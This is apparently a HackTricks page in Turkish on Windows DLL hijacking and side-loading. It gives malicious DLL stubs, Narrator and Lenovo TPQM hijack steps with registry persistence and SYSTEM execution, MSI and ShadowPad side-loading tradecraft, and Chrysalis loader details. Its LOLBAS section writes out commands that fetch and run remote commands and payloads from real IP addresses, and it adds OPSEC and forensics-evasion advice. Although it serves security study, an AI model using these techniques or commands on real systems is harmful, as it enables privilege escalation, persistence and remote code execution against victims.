#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## Vaka Çalışması: Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)

Windows Narrator.exe, başladığında hâlâ öngörülebilir, dil-özgü bir localization DLL'ini arar; bu DLL arbitrary code execution ve persistence için hijacked edilebilir.

Key facts
- Deneme yolu (mevcut sürümler): `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- Eski yol (eski sürümler): `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- OneCore yolunda saldırgan kontrollü ve yazılabilir bir DLL varsa, bu yüklenir ve `DllMain(DLL_PROCESS_ATTACH)` çalışır. Herhangi bir export gerekmez.

Discovery with Procmon
- Filtre: `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Narrator'ı başlatın ve yukarıdaki yolun yükleme denemesini gözlemleyin.

Minimal DLL
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC sessizliği

• Basit bir hijack UI’yi konuşur/vurgular. Sessiz kalmak için, attach olduğunuzda Narrator iş parçacıklarını listeleyin, ana iş parçacığını açın (OpenThread(THREAD_SUSPEND_RESUME)) ve SuspendThread ile durdurun; kendi iş parçacığınızda devam edin. Tam kod için PoC’ye bakın.

Trigger and persistence via Accessibility configuration

• User context (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Yukarıdakilerle, Narrator başlatıldığında yerleştirilen DLL yüklenir. Secure desktop (logon screen) üzerinde CTRL+WIN+ENTER tuşlarına basarak Narrator’ı başlatın; DLL’iniz secure desktop üzerinde SYSTEM olarak çalışır.

RDP-triggered SYSTEM execution (lateral movement)

• Klasik RDP security layer’ını izin verin: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• Host’a RDP ile bağlanın, logon ekranında CTRL+WIN+ENTER ile Narrator’ı başlatın; DLL’iniz secure desktop’ta SYSTEM olarak çalışır.
• Çalışma RDP oturumu kapandığında durur — hızlıca inject/migrate edin.

Bring Your Own Accessibility (BYOA)

• Yerleşik bir Accessibility Tool (AT) registry girdisini (ör. CursorIndicator) klonlayabilir, onu rastgele bir binary/DLL’e işaret edecek şekilde düzenleyip import edebilir, ardından configuration değerini o AT adına ayarlayabilirsiniz. Bu, Accessibility framework’ü altında rastgele kod çalıştırmayı proxy’ler.

Notlar

• %windir%\System32 altına yazmak ve HKLM değerlerini değiştirmek admin yetkisi gerektirir.
• Tüm payload mantığı DLL_PROCESS_ATTACH içinde yaşayabilir; export gerekmez.

Case Study: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

Bu vaka Lenovo’nun TrackPoint Quick Menu’sü (TPQMAssistant.exe) içindeki Phantom DLL Hijacking örneğini gösterir; takip edilen ID CVE-2025-1729’dur.

Vulnerability Details

• Component: TPQMAssistant.exe konumu C:\ProgramData\Lenovo\TPQM\Assistant\.
• Scheduled Task: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask her gün saat 09:30’da oturum açmış kullanıcı bağlamında çalışır.
• Directory Permissions: CREATOR OWNER tarafından yazılabilir, yerel kullanıcıların rastgele dosyalar bırakmasına izin verir.
• DLL Search Behavior: Çalışma dizininden önce hostfxr.dll yüklemeyi deniyor ve eksikse “NAME NOT FOUND” kaydeder; bu, yerel dizin aranmasının öncelikli olduğunu gösterir.

Exploit Implementation

Saldırgan aynı dizine kötü amaçlı bir hostfxr.dll stub’u yerleştirerek eksik DLL’i suistimal edip kullanıcının bağlamında kod çalıştırabilir:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Saldırı Akışı

1. Standart bir kullanıcı olarak hostfxr.dll dosyasını C:\ProgramData\Lenovo\TPQM\Assistant\ dizinine bırakın.
2. Zamanlanmış görevin mevcut kullanıcının bağlamında saat 09:30’da çalışmasını bekleyin.
3. Görev çalıştığında bir yönetici oturum açmışsa, kötü amaçlı DLL yönetici oturumunda medium integrity seviyesinde çalışır.
4. medium integrity’den SYSTEM ayrıcalıklarına yükselmek için standart UAC bypass tekniklerini zincirleyin.

Vaka İncelemesi: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

Tehdit aktörleri sıklıkla MSI tabanlı droper’leri DLL side-loading ile eşleştirerek güvenilir, imzalı bir süreç altında payload’ları çalıştırır.

Zincir özeti

• Kullanıcı MSI indirir. GUI kurulum sırasında (ör. LaunchApplication veya bir VBScript action) bir CustomAction sessizce çalışır ve gömülü kaynaklardan bir sonraki aşamayı yeniden oluşturur.
• Dropper meşru, imzalı bir EXE ve kötü amaçlı bir DLL’i aynı dizine yazar (örnek çift: Avast-signed wsc_proxy.exe + attacker-controlled wsc.dll).
• İmzalı EXE başlatıldığında, Windows DLL arama sırası çalışma dizinindeki wsc.dll’yi önce yükler ve imzalı bir üst süreç altında saldırgan kodunu çalıştırır (ATT&CK T1574.001).

MSI analizi (nelere bakılmalı)

• CustomAction table:
• Yürütülebilir dosyaları veya VBScript çalıştıran girdileri arayın. Şüpheli örüntü: LaunchApplication’ın arka planda gömülü bir dosya çalıştırması.
• Orca (Microsoft Orca.exe) içinde CustomAction, InstallExecuteSequence ve Binary tablolarını inceleyin.
• MSI CAB içinde gömülü/ayrılmış payload’lar:
• Yönetici çıkarımı: msiexec /a package.msi /qb TARGETDIR=C:\out
• Veya lessmsi kullanın: lessmsi x package.msi C:\out
• Bir VBScript CustomAction tarafından birleştirilen ve şifre çözülen birden fazla küçük parçaya bakın. Yaygın akış:

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

wsc_proxy.exe ile pratik sideloading

• Bu iki dosyayı aynı klasöre koyun:
• wsc_proxy.exe: meşru, imzalı host (Avast). Süreç, kendi dizininden adıyla wsc.dll’i yüklemeye çalışır.
• wsc.dll: saldırgan DLL. Belirli exports gerekmedikçe DllMain yeterli olabilir; aksi takdirde bir proxy DLL oluşturun ve gerekli exports’ları gerçek kütüphaneye yönlendirirken payload’ı DllMain içinde çalıştırın.
• Minimal bir DLL payload oluşturun:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• Dışa aktarma gereksinimleri için, DLLirant/Spartacus gibi bir proxy framework kullanarak payload’unuzu da çalıştıran bir forwarding DLL oluşturun.

• Bu teknik host binary’nin DLL isim çözümlemesine dayanır. Eğer host mutlak yollar veya güvenli yükleme flag’leri (ör. LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories) kullanıyorsa, hijack başarısız olabilir.

• KnownDLLs, SxS ve forwarded exports önceliği etkileyebilir ve host binary ile export seti seçilirken dikkate alınmalıdır.

Signed triads + encrypted payloads (ShadowPad case study)

Check Point, Ink Dragon’ın ShadowPad’i çekirdek payload’u diskte şifreli tutarken meşru yazılımlara karışmak için nasıl bir three-file triad kullandığını açıkladı:

1. Signed host EXE – AMD, Realtek veya NVIDIA gibi tedarikçiler kötüye kullanılır (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe). Saldırganlar çalıştırılabilir dosyanın adını Windows binary’si gibi göstermek için değiştirirler (örneğin conhost.exe), ancak Authenticode imzası geçerli kalır.
2. Malicious loader DLL – EXE’nin yanına beklenen isimle bırakılır (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll). DLL genellikle ScatterBrain framework ile obfuskelenmiş bir MFC binary’sidir; tek görevi şifreli bloğu bulmak, deşifre etmek ve ShadowPad’i reflectively map etmektir.
3. Encrypted payload blob – genellikle aynı dizinde <name>.tmp olarak saklanır. Deşifre edilmiş payload bellek eşlemesi yapıldıktan sonra loader TMP dosyasını adli delilleri yok etmek için siler.

Tradecraft notları:

• İmzalı EXE’nin adını değiştirmek (PE header’daki orijinal OriginalFileName korunurken) ona Windows binary’si gibi görünme imkanı verir ancak tedarikçi imzasını korur; Ink Dragon’ın conhost.exe benzeri görünümlü ama aslında AMD/NVIDIA araçları olan binary’leri bırakma alışkanlığını taklit edin.
• Çalıştırılabilir dosya güvenilir kaldığından, çoğu allowlisting kontrolü yanına yerleştirilen kötü amaçlı DLL ile atlatılabilir. Loader DLL’i özelleştirmeye odaklanın; imzalı parent genelde değişmeden çalıştırılabilir.
• ShadowPad’in decryptor’ı TMP blob’un loader’ın yanında bulunmasını ve haritalama sonrası sıfırlanabilmesi için yazılabilir olmasını bekler. Payload belleğe yüklendiği sürece dizini yazılabilir tutun; yükleme sonrası TMP dosyası OPSEC için güvenle silinebilir.

LOLBAS stager + staged archive sideloading chain (finger → tar/curl → WMI)

Operatörler DLL sideloading’i LOLBAS ile eşleştirir; böylece diskteki tek özel artefakt güvenilen EXE’nin yanındaki kötü amaçlı DLL olur:

• Remote command loader (Finger): Gizli PowerShell cmd.exe /c başlatır, bir Finger sunucusundan komutları çeker ve bunları cmd’ye aktarır:

powershell.exe Start-Process cmd -ArgumentList '/c finger Galo@91.193.19.108 | cmd' -WindowStyle Hidden

• finger user@host TCP/79 üzerinden metin çeker; | cmd sunucu yanıtını çalıştırır ve operatörlerin ikinci aşama sunucu tarafını döndürmesine izin verir.

• Built-in download/extract: Zararsız bir uzantısı olan bir arşiv indirin, açın ve sideload hedefini ile DLL’i rastgele bir %LocalAppData% klasörü altına yerleştirin:

$base = "$Env:LocalAppData"; $dir = Join-Path $base (Get-Random); curl -s -L -o "$dir.pdf" 79.141.172.212/tcp; mkdir "$dir"; tar -xf "$dir.pdf" -C "$dir"; $exe = "$dir\intelbq.exe"

• curl -s -L ilerlemeyi gizler ve yönlendirmeleri takip eder; tar -xf Windows’un yerleşik tar’ını kullanır.

• WMI/CIM launch: EXE’yi WMI aracılığıyla başlatın, böylece telemetri CIM tarafından oluşturulmuş bir süreç gösterirken yanındaki DLL yüklenir:

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = "`"$exe`""}

• Local DLL’leri tercih eden ikili dosyalarla çalışır (ör. intelbq.exe, nearby_share.exe); payload (ör. Remcos) güvenilen ad altında çalışır.

• Hunting: /p, /m ve /c birlikte göründüğünde forfiles için uyarı verin; bu kombinasyon yönetici script’leri dışında nadirdir.

Case Study: NSIS dropper + Bitdefender Submission Wizard sideload (Chrysalis)

Son Lotus Blossom ihlali, güvenilen bir güncelleme zincirini kullanarak NSIS ile paketlenmiş bir dropper teslim etti; bu dropper DLL sideload’ı hazırlayıp tamamen bellekte çalışan payload’lar aşamalı olarak yükledi.

Tradecraft flow

• update.exe (NSIS) %AppData%\Bluetooth oluşturur, klasörü HIDDEN yapar, ismi değiştirilmiş bir Bitdefender Submission Wizard BluetoothService.exe, kötü amaçlı log.dll ve şifreli bir blob BluetoothService bırakır, ardından EXE’yi başlatır.
• Host EXE log.dll’i import eder ve LogInit/LogWrite çağırır. LogInit blob’u mmap ile yükler; LogWrite özel bir LCG tabanlı stream ile (sabitler 0x19660D / 0x3C6EF35F, anahtar materyali önceki bir hash’ten türetilir) deşifre eder, buffer’ı plaintext shellcode ile üzerine yazar, geçici verileri serbest bırakır ve oraya atlar.
• IAT’tan kaçınmak için loader, export isimlerini hash’leyerek API’leri çözer (FNV-1a basis 0x811C9DC5 + prime 0x1000193), sonra Murmur-benzeri bir avalanche (0x85EBCA6B) uygular ve salt’lanmış hedef hash’lerle karşılaştırır.

Main shellcode (Chrysalis)

• Beş pass boyunca add/XOR/sub tekrarları ile PE-benzeri ana modülü deşifre eder, sonra import çözümü tamamlamak için dinamik olarak Kernel32.dll → GetProcAddress yükler.
• Çalışma zamanında DLL isimlerini karakter başına bit-rotate/XOR dönüşümleri ile yeniden inşa eder, sonra oleaut32, advapi32, shlwapi, user32, wininet, ole32, shell32’yi yükler.
• İkinci bir resolver kullanır: PEB → InMemoryOrderModuleList üzerinde gezinir, her export tablosunu 4-bayt bloklarla Murmur-benzeri karıştırma ile çözer ve hash bulunamazsa yalnızca GetProcAddress’e geri döner.

Embedded configuration & C2

• Konfigürasyon bırakılan BluetoothService dosyası içinde offset 0x30808’de (boyut 0x980) yer alır ve qwhvb^435h&*7 anahtarı ile RC4 deşifre edilir; bu C2 URL’sini ve User-Agent’i açığa çıkarır.
• Beacon’lar nokta-ile ayrılmış bir host profili oluşturur, başına 4Q tag’i ekler, sonra vAuig34%^325hGV anahtarı ile RC4 şifreleyip HTTPS üzerinden HttpSendRequestA kullanır. Yanıtlar RC4 ile deşifre edilir ve tag switch ile yönlendirilir (4T shell, 4V process exec, 4W/4X dosya yazma, 4Y okuma/exfil, 4\\ uninstall, 4 sürücü/dosya enum + parça transfer vakaları).
• Çalıştırma modu CLI arg’lerine göre kontrol edilir: arg yok = persistence (service/Run key) kurar ve -i’ye işaret eder; -i kendini -k ile yeniden başlatır; -k kurulumu atlar ve payload’u çalıştırır.

Alternate loader observed

• Aynı ihlal Tiny C Compiler bıraktı ve C:\ProgramData\USOShared\ altından svchost.exe -nostdlib -run conf.c çalıştırdı; yanında libtcc.dll vardı. Saldırgan tarafından sağlanan C kaynağı shellcode’u gömülü tuttu, derledi ve bir PE’ye dokunmadan bellekte çalıştırdı. Tekrarlamak için:

C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c

• Bu TCC tabanlı compile-and-run aşaması runtime’ta Wininet.dll’i import etti ve ikinci aşama shellcode’u hardcoded bir URL’den çekerek derleyici çalışması gibi görünen esnek bir loader sağladı.

Referanslar

• Red Canary – Intelligence Insights: January 2026
• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
• Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
• 0xdf – HTB Bruno ZipSlip → DLL hijack chain

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.